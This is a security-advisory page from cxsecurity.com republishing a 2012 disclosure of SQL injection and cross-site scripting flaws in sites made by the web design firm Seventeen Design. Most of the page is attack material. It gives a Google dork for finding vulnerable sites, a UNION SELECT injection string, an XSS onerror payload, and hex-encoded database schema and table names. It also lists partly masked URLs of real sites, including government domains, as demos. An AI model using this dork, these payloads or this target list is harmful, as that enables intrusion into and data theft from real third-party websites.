Bug: Seventeen Design Cross Site Scripting & SQL Injection ( Ascii Version )

Search:
WLB2

Seventeen Design Cross Site Scripting & SQL Injection

Published
Credit
Risk
2012.11.30
Ur0b0r0x
Medium
CWE
CVE
Local
Remote
CWE-89
CWE-79
N/A ( Add )
No
Yes
 Dork: intext:"Producido por: Seventeen Design."

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
INDEPENDENT SECURITY RESEARCHER
PENETRATION TESTING SECURITY
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# Author: Ur0b0r0x
# Tiwtte: @Ur0b0r0x
# Email: ur0b0r0x_@live.com
# Line: GreyHat
# Home: http://cyberpunk-ur0x.blogspot.com/

# Exploit Title: Seventeen Design - SQL Injection / Cross-Site Scripting Vulnerabilities
# Dork: intext:"Producido por: Seventeen Design."
# Date: 28/11/2012
# Author: Ur0b0r0x
# Url Vendor: http://www.seventeendesign.com/
# Vendor Name: Seventeen Design
# Tested On: Backtrack R3 / Linux Mint
# Type: php

------------------- Agreement --------------------
[24/11/2012] - Vulnerability discovered
[27/11/2012] - Vendor notified Dont responsed
[28/11/2012] - Public disclosure
--------------------------------------------------

# Expl0it/P0c ###################
http://site.com/*.*id= < Sql Vulnerability Path >
http://site.com/*.*id= < Xss Vulnerability Path >

# Exploit/Comand/Sql=> +union+select+1,2,3,4--
# Exploit/Comand/Xss=> "><img src=x onerror=alert("ur0b0r0x");>
# Payload/Comand/Sql=> table_schema=0x6D6F6E7465676F625F6D6F6E74656176696C61 / table_name=0x6175746F726573

# Demo_Xss_Sql_Vulnerabilities
http://www.distriXXXdellibro.gob.ve/detalle.php?id=447
http://www.moXXavila.gob.ve/mae/detail_new.php?id=147'
http://www.muXXXan.com/aig/nota.php?id=9'
http://www.XXXtopublico.com/noticia.php?id=45'

References:

http://www.seventeendesign.com/

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version